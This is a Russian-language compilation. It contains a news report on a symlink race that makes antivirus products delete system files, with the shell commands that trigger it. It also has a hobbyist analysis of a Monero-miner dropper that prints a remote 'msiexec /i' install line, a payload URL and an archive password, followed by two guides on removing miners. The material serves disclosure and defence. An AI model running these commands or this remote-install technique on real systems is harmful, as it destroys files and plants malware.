Для проведения атаки необходимо загрузить файл, который антивирус распознает как вредоносный (например, можно использовать тестовую сигнатуру), а через определённое время, после выявления вредоносного файла антивирусом, но непосредственно перед вызовом функции для его удаления, подменить каталог с файлом символической ссылкой. В Windows для достижения того же эффекта выполняется подмена каталога при помощи точки соединения (directory junction). Проблема в том, почти все антивирусы должным образом не выполняли проверку символических ссылок и, считая что удаляют вредоносный файл, удаляли файл в каталоге на который указывает символическая ссылка.
В Linux и macOS показано как таким способом непривилегированный пользователь может удалить /etc/passwd или любой другой системный файл, а в Windows DDL-библиотеку самого антивируса для блокирования его работы (в Windows атака ограничена только удалением файлов, которые в текущим момент не используются другими приложениями). Например, атакующий может создать каталог «exploit» и загрузить в него файл EpSecApiLib.dll с тестовой сигнатурой вируса, после чего перед удалением заменить каталог «exploit» на ссылку «C:\Program Files (x86)\McAfee\Endpoint Security\Endpoint Security Platform», что приведёт к удалению библиотеки EpSecApiLib.dll из каталога антивируса. В Linux и macos аналогичный приём можно проделать с подменой каталога на ссылку «/etc».
rm -rf /home/user/exploit ; mkdir /home/user/exploit/
while inotifywait -m “/home/user/exploit/passwd” | grep -m 5 “OPEN”
rm -rf /home/user/exploit ; ln -s /etc /home/user/exploit
Более того, во многих антивирусах для Linux и macOS было выявлено использование предсказуемых имён файлов при работе с временным файлами в каталоге /tmp и /private/tmp, что могло использоваться для повышения привилегий до пользователя root.
К настоящему времени проблемы уже устранены большинством поставщиков, но примечательно, что первые уведомления о проблеме были направлены производителям ещё осенью 2018 года. Несмотря на то, что не все производители выпустили обновления, им было дано на исправление как минимум 6 месяцев, и RACK911 Labs считает, что теперь вправе раскрыть сведения об уязвимостях. Отмечается, что компания RACK911 Labs давно занимается работой по выявлению уязвимостей, но она не предполагала, что с коллегами из антивирусной индустрии будет так трудно работать из-за затягивания выпуска обновлений и игнорирования необходимости срочного устранения проблем с безопасностью.
Продукты, подверженные проблеме (свободный антивирусный пакет ClamAV в списке отсутствует):
Comodo Endpoint Security
Eset File Server Security
F-Secure Linux Security
Kaspersy Endpoint Security
McAfee Endpoint Security
Sophos Anti-Virus for Linux
Avast Free Anti-Virus
Avira Free Anti-Virus
Comodo Endpoint Security
F-Secure Computer Protection
FireEye Endpoint Security
Intercept X (Sophos)
Kaspersky Endpoint Security
Malwarebytes for Windows
McAfee Endpoint Security
Webroot Secure Anywhere
BitDefender Total Security
Eset Cyber Security
Kaspersky Internet Security
McAfee Total Protection
Microsoft Defender (BETA)
Webroot Secure Anywhere
Криптоджекинг. Разбор случайного вируса-майнера под Windows.
Как-то раз на неделе обратился ко мне коллега из офиса, говорит, что его домашний компьютер вдруг начинает жутко лагать, самопроизвольно перезагружается, и т.п.
Я взялся посмотреть, что же это было.
Первым делом была проверена автозагрузка процессов и служб, как обычно делает большинство «мастеров», думая, что они при отключении там чего-либо полностью излечили компьютер от вирусов. Может быть раньше, со всякими WinLocker’ами или рекламными баннерами этот трюк и прокатывал, но времена меняются, и теперь технологии другие. В винде любых версий есть старые дыры, но вполне функциональные. Итак, первое, что видно при включении ЭВМ — открывается вот такое вот окошко (скрин не было сделать возможности с него, звиняйте, скрины пойдут дальше):
В автозагрузке, повторюсь всё в порядке:
После того, как компьютер был штатно заштопан двумя разными антивирусами, возникла идея исследовать этот файл, который система начала загружать. Но не всё оказалось так просто.
Итак, дальше расписано по шагам, каким образом работает этот вирус, и к какому конечному результату это приводит.
Шаг 0. Попадание первичного файла в систему.
Для того, чтобы в системе MS Windows инициировался какой-либо процесс, что-то должно его запускать. В первых версиях вирусов — ярлык вируса просто кидался в папку автозагрузки программ, в Windows 7 она находится по адресу:
%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
Потом вирусы стали добавляться в ветви реестра [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run] и то же самое в разделе HKEY_LOCAL_MACHINE, откуда удалить их было уже не так просто. Но оказалось, что в автозагрузку эти файлы можно и не добавлять, чтобы не провоцировать простенькие антивирусы. В системе существует «Планировщик заданий» (mmc.exe), куда прекрасно можно добавить задачу автозапуска какой-либо программы, и даже целую исполняемую часть командной строки (сценарий):
В таком случае на действия начинают реагировать лишь единицы антивирусов, никакие а**сты, макаффи и т.п. фри версии антивирей туда по большей части даже не суются.
Итак, я попытался зайти на тот адрес из окна (http://f******r.com/) в веб-браузере. Но, попробовав ввести тот адрес, да и вообще, какой бы адрес я не открывал, я получал заглушку на nginx:
Дальше я стал копать и выяснил, что бирюзовое окно — это рабочее окно системы BITS (Background Intelligent Transfer Service). Изначально он предназначен для быстрой передачи данных по специальному протоколу через команды приложений. Как оказалось, именно этот протокол (с 2016 года, по версии xakep.ru) стал часть использоваться для загрузки вирусов. Поэтому я подключился через этот протокол, используя команды PowerShell по оригинальному адресу:
И, вуаля, я получил какой-то файл, весом гораздо больше пустой веб-страницы:
Видимо, на сервере специальным образом настроены порты, чтобы при обращении именно от BITS был отправлен экземпляр этого файла. При этом, как выяснилось, неважно, какое название у архива — всегда будет получен тот же файл. Давайте исследуем его.
Шаг 1: Первичный файл загружен. Что это?
Я открыл файл в Hex-редакторе, чтобы распознать тип. Начинается он с MZP, значит файл исполняемый. В файле была обнаружена сигнатура Inno Setup, стало ясно, что это — файл инсталлятора чего-либо:
Шаг 2. Вместо установки этого файла я воспользовался утилитой Inno Unpacker, которая дала мне следующие файлы, содержащиеся внутри проекта:
Собственно, как оказалось, программа никаких файлов в себе не содержала — только скрипт install_script с описанием установщика, а так же скомпилированный фрагмент кода, выполненного на паскале. Вот файл скрипта:
Обратите внимание на параметры [Setup], а именно название программы, и выходное имя файла OutputBasenameFile (оно совпадает кое с чем на первой картинке).
Шаг 3. Также неизвестным оставался код программы CompiledCode.bin. Для того, чтобы расшифровать его, я воспользовался декомпилятором паскаль-фрагмента кода:
Шаг 4. Стало ясно, что данные внутри кода немного зашифрованы (обфусцированы) от посторонних глаз. Немного видоизменив код, я интерпретировал его на FreePascal’е, и получил следующий результат:
Собственно, здесь можно видеть копии команд, выполняемых в Windows через cmd shell. Здесь указана команда на мгновенную перезагрузку (скорее всего, отключает антивирус: во время выключения все программы закрываются, но сам код успевает исполнится, таким образом простые антивирусы не обнаружат загрузки кода). Зачем предназначена 5 строка (пингует локалхост), я точно не знаю — скорее всего это какие-то внутренние операции для работы вируса. Программа также передаёт на сервер данные о системе, её разрядности, производительности и т.п. отдельным потоком, это можно видеть в коде, но эту часть я вырезал из-за сложности интерпретации.
Подробно нас интересует четвертая строчка: что такое msiexec?
Шаг 5. Загрузка главного инсталлятора. Распаковка.
Для тех, кто слышит об этом в первый раз — да, не удивляйтесь. Вбив в командную строку такую команду: msiexec.exe /q /i (веб-адрес), начнется немедленная, скрытая и невидимая установка исполняемого кода с удаленного адреса в систему, если инсталлятор и скрипт собран в формате msi. Файл может даже не иметь сертификата подписи. В файле могут исполняться любые команды по созданию, перемещению, переименованию файлов внутри системы, добавления их в реестр и запуск. Зачем это было добавлено? Именно через эту подпрограмму система загружает обновления. Ничего не мешает закинуть туда свои скрипты и файлы.
Ситуация такая же, как и с первым файлом — если открыть этот сайт по http, он выдаёт заглушку массой в 233 байта. Если же обратиться по любому адресу через msiexec, то сервер посылает очередной архив, весом в 2,9 Мб. Скорее всего, это вызвано определенным использование портов и специальных команд системы. Но сайт в этот раз уже другой. Это может быть одно из сотен зеркал, все настроены одинаково — обратившись по новому домену через оригинальный BITS я получил файл, весом в 328 Кб, т.е. файл с паскалем. И наоборот.
Давайте посмотрим, что внутри инсталлятора, для этого распакуем его при помощи 7-zip как обычный архив:
Внутри инсталлятора (MSICEE2.msi) оказались два файла: unzip.exe и vcruntime140.lib.zip. Во втором архиве ещё два файла, но он запаролен. Для начала я исследовал файл unzip.exe:
Оказалось, что этот файл является неизмененной копией утилиты для систем Windows 2005 года, которая называется «Info-Zip UnZip», и являющейся простым распаковщиком zip-файлов. Вот, что будет, если её запустить:
Несмотря на древность, применение этой утилиты здесь оправдано, далее расскажу, почему именно. Итак, осмотрев файлы мы зашли в тупик — что делать? Программа изучена, а второй архив запаролен. Но при помощи архиватора 7-zip мы не смогли извлечь установочный скрипт из MSI-файла. Пришлось запустить этот инсталлятор на виртуальной машине с логгированием: такой командой: msiexec.exe /i http://revir.i********s.info/yskwozrivwuwc.txt /L*V log.txt
После чего из машины был вытащен лог установки, размером в 140кб. Пройдусь по его ключевым моментам:
Шаг 6. В одной из строчек виден пароль от архива: IBM644. Но обычный архиватор этот пароль не принимает — распаковываются файлы только оригинальным UnZip’ом при помощи этой команды.
Все файлы внутри архива — исполняемые библиотеки для системы типа dll или lib. Написаны они на C, декомпилировать их я смысла не видел. Возможно, именно в них содержится блок, занимающийся копированием вируса в системе, но так глубоко я их не копал. В песочнице после их регистрации в системе (папка TEMP) появился следующий файл: [612A9A]. Смотрим, что у него внутри:
Этот файл представляет собой json — конфиг, в котором видно ключевое слово CryptoNight и URL, логин и пароль от майнинг-сервера. Данный майнер майнит монету «Monero». Данный файл подозрительно совпадает с конфиг-файлом для Windows-версии майнера «****Rig»:
Скормив этот конфиг исполняемому файлу майнера (оконной версии), загруженному из интернета, действительно компьютер получил настоящую «работу», и видео при этом стало жутко лагать. В оригинальном конфиге прописано также исполнение без gui (фоновым процессом — никаких окон).
Собственно, это и есть конечный результат. Помайнил 10 секунд для него, чтобы сделать вам скрин, надеюсь, что вырученных за это время денег автору хватит как минимум на два билета до Канарских островов. Итого имеем сложный файл, прописывающий себя в нескольких местах системы, работающий на языках Pascal и C++, в итоге приводящий к запланированному запуску майнера. Берегите свои компьютеры. С вами был Kekovsky, специально для pikabu.
Как найти и удалить майнер с компьютера Windows
Я, журналист Telegram-канала, Раевская Ксения. Хочу рассказать вам как обнаружить вирусы-майнеры, избавиться и обезопасить свой компьютер от них.
Некоторые пользователи время от времени встречаются с зависаниями ПК. Этому есть множество причин — от слабых комплектующих до заполненной памяти. Но так же устройства начинают виснуть из-за компьютерных вирусов. Они бывают разными, но мы приведем в пример вирусы, которые добывают криптовалюты за счет вычислительных мощностей зараженных ПК. Такие вредоносные программы являются очень популярными среди злоумышленников еще с 2018 года. Именно поэтому мы считаем, что спустя 4 года каждому пользователю нужно знать, как найти майнер на компьютере Windows 7, 10 вовремя. В противном случае ПК может сломаться. Также есть риск утечки персональных данных.
Что такое вирус-майнер
Вирус-майнер — это вредоносная компьютерная программа, которая использует вычислительные ресурсы ПК для добычи криптовалюты. Такая программа работает в автоматическом режиме и никак не уведомляет пользователей о добыче монет.
Принцип работы
Вирус-майнеры (далее зловреды) создают хакеры и с помощью вредоносных программных обеспечений (ПО) задействуют ресурсы зараженных ПК для добычи криптовалют. Вирусы майнят цифровые монеты прямо на компьютерах жертв, после чего автоматически отправляют добытые криптовалюты на кошельки злоумышленников.
Чем опасен
В основном происходит быстрый износ компьютерных комплектующих. Майнеры сильно нагружают их и оборудование попросту не выдерживает ежедневного майнинга. Как итог компьютеры выходят из строя быстрее, чем при обычном режиме работы.
Обычно ломаются такие комплектующие как:
Модули оперативной памяти (ОЗУ или DRAM);
Как мы уже сказали ранее, ПК со скрытыми майнерами могут сильно тормозить и зависать и это связано с высокой загрузкой комплектующих. Оборудование не успевает обрабатывать другие задачи.
Многие вирус-майнеры собирают информацию о пользователях, а так же воруют фотографии и другие файлы, регистрационные данные разных аккаунтов и даже криптовалютные кошельки. Что в свою очередь приводит к сливу сведений, потере учетных записей и сбережений.
Способы заражения вирусом
Существует 2 основных метода загрузки замаскированного майнера:
Скачивание файлов из непроверенных источников. Часто зловреды встроены в нелицензированный контент.
Чтение спама. В рассылки злоумышленники тоже встраивают вредоносные программы. Но пока что заражение через спам — редкость.
Обычно криптомайнер скачивается сразу с искомым файлом. Но и возможно, что сначала загружается мошенническая утилита, которая незаметно скачивает вирус из интернета чуть позже. Такие утилиты не присылают уведомление о загрузках.
Как прячется на ПК
Работу вирус-майнеров обычно контролируют удаленные сервисы, маскирующие программы на ПК. При этом сервисы автоматически контролируют запуск ПО, их поведение в системе и другие действия.
Обычно вирусы отключаются при запуске тяжелых приложений: программ для обработки видео, требовательных игры и пр. Автоматическое отключение криптомайнеров позволяет зараженным ПК полностью тратить свои ресурсы на открытые приложения. И тогда компьютер лишь временно не виснет и не тормозит. После закрытия тяжелых приложений вредоносные ПО снова начинают функционировать.
Часть удаленных сервисов отслеживают программы системного мониторинга. Злоумышленники настраивают автоматическое отключение майнеров, если пользователи запускают ПО. Вирусные программы «выгружаются» из списка текущих процессов и становятся незаметными.
Как найти майнер на компьютере
Обнаружить ПО могут антивирусы с обновленными базами данных, но в основном они находят лишь простые вредоносные софты. Однако проверять компьютеры на наличие майнеров антивирусами все равно полезно. Делать это рекомендуется при внезапном появлении зависаний ПК.
Найти хорошо скрытые криптомайнеры трудно. Есть 2 эффективных метода их обнаружения:
Через диспетчер задач;
С помощью сторонних программ.
В операционную систему (ОС) Windows встроена служба мониторинга текущих процессов (Диспетчер задач), позволяющая отслеживать нагрузку на различные комплектующие ПК, которую создают открытые приложения. Также через диспетчер можно:
Настраивать автозапуск программ;
Принудительно закрывать приложения.
Открыть диспетчер задач можно нажатием сочетания клавиш Ctrl+Shift+Esc, а также через поиск в меню «Пуск».
Алгоритм отслеживания майнера через диспетчер задач:
Нажать «Подробнее» в левом нижнем углу окна;
Завершить работу лишних приложений через раздел «Процессы». Нужно закрыть запущенные программы, браузеры и прочее, что бы освободить ресурсы компьютера;
Отсортировать приложения по колонке «Графический процессор»(В некоторых версиях Windows 10 она называется GPU);
Проследить за работой служб и программ. Лучше провести несколько мониторингов по 10-15 минут в разное время. При проверке нельзя даже двигать компьютерной мышью.
В случае появления случайного процесса с высокой нагрузкой GPU нужно изучить его происхождение. Сделать это можно через вкладку «Подробности». Если появившимся процессом окажется вирус, необходимо срочно избавиться от майнера на компьютере.
Самые опасные майнеры автоматически выключают службу в течение 5 минут в среднем. Это явный признак наличия зловредов. Их нужно срочно обнаружить и удалить. Если сделать это самому не получается, лучше обратиться в сервисный центр.
Иногда в диспетчере отображается ненормально высокая загрузка центрального процессора из-за браузера, когда он запущен. В иных же случаях это определенно скрытый веб-майнер. Но если в компьютер или ноутбук установлен слабый процессор, чаще всего переживать не о чем.
AnVir Task Manager
Старые версии ОС Windows не имеют колонки «Графический процессор» в диспетчере и для обнаружения скрытых криптовалютных майнеров нужно применять сторонние ПО. Одно из таких — популярный утилит для мониторинга — AnVir Task Manager, позволяет отслеживать гораздо больше данных, чем встроенный инструмент Windows.
Для начала его работы нужно запустить программу и не совершать никаких действий. Если в ПО появится активность, которая сильно нагружает CPU или GPU, потребуется вычислить ее происхождение. Скрытый майнер нужно убрать, воспользовавшись любым доступным способом.
Как удалить майнер с ПК
Существуют 3 метода удаления майнера:
С помощью «лечащей» утилиты;
Вручную через реестр.
Использование антивируса — самое логичное действие. Если он установлен на ПК, его нужно применить в первую очередь. К сожалению, только часть антивирусов может обозначить их как потенциальные угрозы. Их тоже требуется устранять.
Удалить вирусы также можно вручную. Для начала нужно распознать майнер, а затем выполнить следующие действия:
Нажать Win+R на клавиатуре;
Ввести команду regedit;
Кликнуть по «Да» в появившемся окне;
Нажать Ctrl+F, чтобы открыть окно поиска;
Ввести название процесса, за которым скрывается вирус-майнер;
Нажать «Найти далее»;
Удалить все совпадения в выдаче реестра;
После выполнения последнего шага реестр обновится. Файлы предполагаемого майнера удалятся. Чтобы проверить результат, нужно будет снова проследить за вычислительной нагрузкой на комплектующие компьютера через «диспетчер задач».
Как защитить ПК от майнеров
Не скачивать файлы из непроверенных источников. Обычно это главный путь заражения компьютеров криптомайнерами;
Не рекомендуется посещать подозрительные сайты. Они могут фоново без разрешений пользователей загружать вредоносные программы на компьютер.
Злоумышленники специально разрабатывают веб-сервисы для добычи криптовалют на компьютерах интернет-пользователей. Такие сайты автоматически запускают майнинг при посещениях. При этом они не заражают сам компьютер.
Существует 2 основных метода защиты от скрытого майнинга в браузере:
Деликатный — использование расширений;
Грубый — отключение JavaScript (JS) через настройки браузера.
Первый метод отличается удобством. Браузерные расширения блокируют подозрительные скрипты выборочно. Они постоянно проводят онлайн-проверки ПК на майнеры, что позволяет не нарушать работу пользователя с надежными сайтами.
Рассмотрим 3 примера расширений для блокировки скриптов:
ScriptBlock — для браузера Chrome.
NoScript — для Firefox.
ScriptSafe — для Chrome.
Оказать помощь могут и блокировщики браузерной рекламы. Например, такие как AdBlock и uBlock (имеют списки серверов, на которых работают скрытые криптомайнеры).
К тому же существуют специальные расширения для блокировки браузерных майнеров, чьи разработчики периодически обновляют списки скрытых добытчиков криптовалют. В число таких расширений входят NoCoin, MinerBlock и др.
Второй метод с отключением JavaScript считается грубым, в связи с нарушением работы многих сайтов. Сервисы с большим числом опций часто функционируют именно на JavaScript. Отключаем скрипт и сайты перестанут нормально работать. Однако метод почти на 100% гарантирует очистку от скрытых криптомайнеров.
Алгоритм отключения скрипта на примере Chrome:
Нажать «Настройка и управление Google Chrome» (иконка с 3 вертикальными точками в правом верхнем углу интерфейса);
Открыть вкладку «Настройки»;
Перейти в раздел «Конфиденциальность и безопасность»;
Открыть «Настройки сайтов»;
Выбрать JavaScript под пунктом «Контент»;
Нажать «Запретить сайтам использовать JavaScript».
За седьмым шагом последует исполнение программных кодов JS, которое станет запрещено в Chrome. При необходимости через настройки браузера можно создать исключения для надежных знакомых сервисов.
Программы для поиска майнеров на ПК
Сейчас существует множество программных обеспечений для мониторинга системных процессов и обнаружения зловредов. В таблице ниже представлены 3 наиболее популярных софта, позволяющих пользователю найти и удалить скрытый вирус-майнер на своем ПК.
Как найти и удалить майнер: инструкция по устранению и профилактике
Чем опасен? Найти и удалить майнер – первостепенная задача при малейших подозрениях на его наличие. Такое вредоносное ПО сильно нагружает процессор, видеокарту, а также может похитить данные.
Как устранить? Существует несколько способов избавиться от майнера. Самый простой – использовать антивирусы со встроенной функцией, но это не всегда работает. В таком случае придется заниматься чисткой вручную.
Материал опубликован исключительно в ознакомительных целях и не является инвестиционной рекомендацией.
Признаки и опасность майнера
Зловредные программы могут попасть на ПК разными путями:
- Веб-обозреватель. При открытии сомнительного сайта вирус проникает в систему. Есть разновидности, которые активны только онлайн, как только пользователь покидает страницу, все приходит в норму.
- Скачивание и установка приложений и файлов также может привести к заражению.
Даже если вести себя в сети очень аккуратно, то все равно очень велик риск получить зловреда. Поэтому для обеспечения безопасности компьютера рекомендуется установить надежный антивирусный пакет.
Miner несет серьезную угрозу для программной и аппаратной частей ПК и может нанести следующий ущерб:
- Сокращение срока эксплуатации процессора, видеокарты, оперативной памяти, кулера. Долговременная добыча крипты сопровождается огромным потреблением ресурсов, поэтому все комплектующие изнашиваются быстрее.
- Снижение производительности. Для своей работы Miner задействует практически все мощности компьютера-жертвы. На другие задачи, решаемые пользователем, они тратятся по остаточному принципу.
- Получение доступа к персональным данным. Майнер – это разновидность трояна, поэтому способен отследить конфиденциальную информацию и передать мошенникам. Поэтому преступники используют в своих корыстных целях не только производительность машины, но и сведения о ее владельце.
Обнаружить деятельность майнера обычными методами непросто, поскольку он содержит программный модуль, контролирующий запуск сканера, и при обнаружении его активности тут же убирает свои процессы из диспетчера задач. Есть разновидности вирусов, блокирующих работу программ мониторинга и даже редактора реестра.
Способы найти майнер
С задачей поиска майнера в принципе справляются современные антивирусные программы, но они в большинстве случаев используют сигнатурный принцип поиска, поэтому их нужно всегда своевременно обновлять. Запускать проверку необходимо регулярно, особенно при появлении внезапных «зависаний» ПК.
Диспетчер задач
Операционная система (ОС) Windows имеет в своем составе диспетчер задач – программу, с помощью которой можно производить мониторинг и настройку многих важных параметров, в том числе и проследить активность текущих процессов.
Последовательность шагов для обнаружения майнера через диспетчер задач:
- Запустить программу;
- Нажать «Подробнее» в левом нижнем углу окна.
- Закрыть все ненужные процессы, сняв нагрузку с ЦП и оперативной памяти.
- В колонке GPU произвести сортировку приложений.
- Внимательно отслеживать работу программ в течение 10-15 минут. Рекомендуется произвести несколько таких наблюдений в различное время. Во время мониторинга нельзя запускать никаких сторонних программ.
Если увидели, что какой-то подозрительный процесс оказывает аномально высокую нагрузку на процессор, то надо узнать какой программе он принадлежит. Посмотреть эту информацию можно во вкладке «подробности». Если это вирус, то необходимо от него избавиться.
Если самостоятельно справиться со зловредом не получилось, необходимо обратиться к специалисту.
Бывают случаи высокой нагрузки на процессор при работающем браузере. Это может быть признаком наличия веб-майнера. Тревога будет ложной, если на компьютере слабый ЦП. В этом случае такая ситуация, скорее всего, норма.
AnVir Task Manager
Пользуется популярностью специальная утилита AnVir Task Manager, которая имеет гораздо более расширенный функционал по сравнению со встроенным инструментарием операционной системы.
Скачав и запустив программу, можно получить ряд полезных дополнений к управлению процессами и сервисами: от обнаружения и удаления вирусов до повышения общей производительности компьютера за счет оптимизации параметров.
Удаление майнера с помощью программ
Некоторые разновидности вируса-майнера нельзя удалить без помощи специального ПО.
Антивирусная программа может определить майнера, но ей не всегда удается его нейтрализовать. Тогда нужно действовать в ручном режиме.
Чаще всего заразить компьютер можно при скачивании файлов с сомнительных сайтов. Если после этого возникли проблемы, то можно попытаться справиться самостоятельно. Прежде всего нужно деинсталлировать подозрительное приложение, а затем приступить к поиску и удалению скрытого майнера.
При удачном стечении обстоятельств (например, вирус типовой и несложный) удалить его не составит труда. Нужно открыть «Диспетчер задач» любым способом. Если в перечне процессов есть такой, который нагружает ЦП или GPU более, чем на 20 %, то, возможно, это и есть нежелательное ПО. Необходимо предпринять действия по его удалению. Иногда при этом возможна потеря всех несохраненных данных.
К сожалению, этот рецепт бесполезен для большинства современных вирусов. Таким образом, если попытка не увенчалась успехом, можно попробовать следующий метод:
- Произвести проверку ПК антивирусным сканером. При обнаружении зловреда и невозможности нейтрализовать его, следует выполнить перезагрузку.
- В самом начале в зависимости от версии системы следует быстро нажать клавишу F8 или shift+F8. Выбрать загрузку операционной системы в безопасном режиме с поддержкой сетевых драйверов. В версиях Windows 10 для активации входа нужно запустить конфигурацию системы msconfig, и в открывшемся окне поставить соответствующие галочки.
- После загрузки системы убедиться, что подключение к сети Интернет активно.
- Запустить браузер.
- Найти и скачать Antispyware, при помощи которой можно избавиться от этих угроз.
Очевидно, что профилактика эффективнее лечения. Поэтому лучше не ждать заражения, а заблаговременно установить хороший антивирус.
В Windows 10 существует возможность включения загрузки в безопасном режиме через клавишу F8. Для этого надо:
- запустить режим командной строки, нажав Win + R и введя в появившемся окне cmd;
- прописываем строку: bcdedit /set
bootmenupolicy legacy и нажимаем enter; - если понадобиться отключить функцию, то пишем: bcdedit /set default bootmenupolicy.
Современные антишпионские утилиты умеют не только обезвреживать вредоносные программы, но настраивать браузер и оптимизировать работу операционной системы.
Опытные пользователи часто применяют очень умелую и эффективную программу-сканер Dr.Web CureIt!
Удаление майнера через реестр
Один из действенных способов избавиться от любого нежелательного ПО, в том числе и майнера, очистка реестра системы. Но этот метод подходит только для опытных пользователей, знающих и понимающих суть проводимых манипуляций. В противном случае можно причинить непоправимый вред и придется переустанавливать Windows. Все действия в редакторе реестра следует производить очень внимательно и в строгом соответствии с инструкцией. Использовать глубокую очистку реестра следует только в том случае, если другие методы не помогли. Для этого надо:
- Произвести запуск «Диспетчера задач». Определить какой из активных процессов в наибольшей степени нагружает ЦП или GPU. Очень важно по названию точно определить назначение программы (информацию можно найти в интернете) для того, чтобы не удалить по ошибке какой-нибудь важный компонент ОС. Нужно внимательно читать имя, потому что создатели майнеров часто их маскируют под вполне благонадежные файлы, изменив одну из букв.
- В случае точной идентификации зловреда нужно скопировать его название. Затем создать точку восстановления системы для возврата в исходное состояние в случае неудачи.
- Запустить «Редактор реестра». В поле поиска на панели задач нужно ввести regedit и выбрать соответствующую стандартную программу.
- В левой части окна выделить «компьютер» для поиска по всем ветвям. Затем нужно перейти на вкладку «Правка», и активировать функцию «Найти».
- Написать название определенного ранее вируса и нажать на кнопку «Найти далее».
- Удалить найденные совпадающие записи. Перед тем как нажать на кнопку, еще раз внимательно все проверьте. При малейших сомнениях лучше поискать информацию в интернете.
Изменения вступят в силу только после перезагрузки операционной системы. Если после очистки реестра ПК работает в нормальном режиме и в диспетчере задач не обнаруживается наличие подозрительных процессов, нагружающих центральный процессор или оперативную память, то, значит, процедура прошла успешно. При возникновении каких-либо неполадок всегда есть возможность вернуть исходное состояние ОС, используя заблаговременно созданную точку восстановления.
Если в диспетчере задач не видно подозрительных процессов, то может помочь использование Process Explorer. Эта программа, позволяющая расширить функционал стандартного системного монитора. Среди особенностей есть возможность поиска в интернете информации обо всех найденных сомнительных задачах, активно нагружающих центральный процессор или видеокарту компьютера. Для этого достаточно нажать правой кнопкой мыши (ПКМ) на его обозначение и выбрать в контекстном меню пункт «Search Online».
Стоит внимательно изучить полученные сведения для того, чтобы иметь представление об опасности файла. Если подозрения подтвердятся, и действительно удалось найти скрытый майнер, то следует его удалить. Как это сделать, подробно описано выше. После удаления рекомендуется еще раз запустить сканер антивируса и тщательно проверить систему. Разумеется, приложение или игра, в которой скрывался майнер, также подлежит деинсталляции для того, чтобы избежать рецидива.
Защита браузера от майнера
Очень редко антивирусные пакеты даже от известных производителей обладают возможностью блокировки майнеров, встроенных в код сайта. Тем не менее, существуют эффективные методы для борьбы с этими угрозами.
Отдельные пользователи видят выход в блокировке работы JavaScript, изменяя соответствующие настройки в браузере. Действительно, это довольно неплохой метод, но тут есть определенные тонкости. Дело в том, что некоторые страницы или их элементы без включенных скриптов просто не загрузятся.
Лучше производить гибкую настройку использования скриптов, применяя специальные дополнения и расширения для браузеров. Например, известный блокировщик нежелательных элементов — AdBlock, который, вопреки расхожему мнению, убирает не только назойливую рекламу, но и имеет внушительную встроенную систему фильтров. С его помощью можно отключить какой-либо отдельный тип скрипта на всех сайтах.
Информация о ссылках на скрипты-майнеры в HTML давно общеизвестна. Поэтому, произвести блокировку вируса будет легко, достаточно прописать в AdBlock путь к скрипту и создать новое правило. Очевидно, что создатели вирусов тоже совершенствуют свои творения, придают им новый функционал и способности. Поэтому, заниматься ручным поиском и блокировкой новых и малоизвестных зловредов малопродуктивно. Предпочтительнее использовать специальные программы для борьбы с проблемой. Например, инсталлировать эффективное расширение-антимайнер.
В современном мире, в котором IT-сфера играет все более определяющую роль, появление новых модификаций вирусов опережает развитие средств борьбы с ними. Поэтому настоящей стопроцентной защиты от киберугроз просто не существует. Снизить риск заражения поможет элементарная осторожность и внимательность. Не стоит посещать сомнительные сайты, скачивать подозрительное программное обеспечение, следить за обновлением антивируса и пр.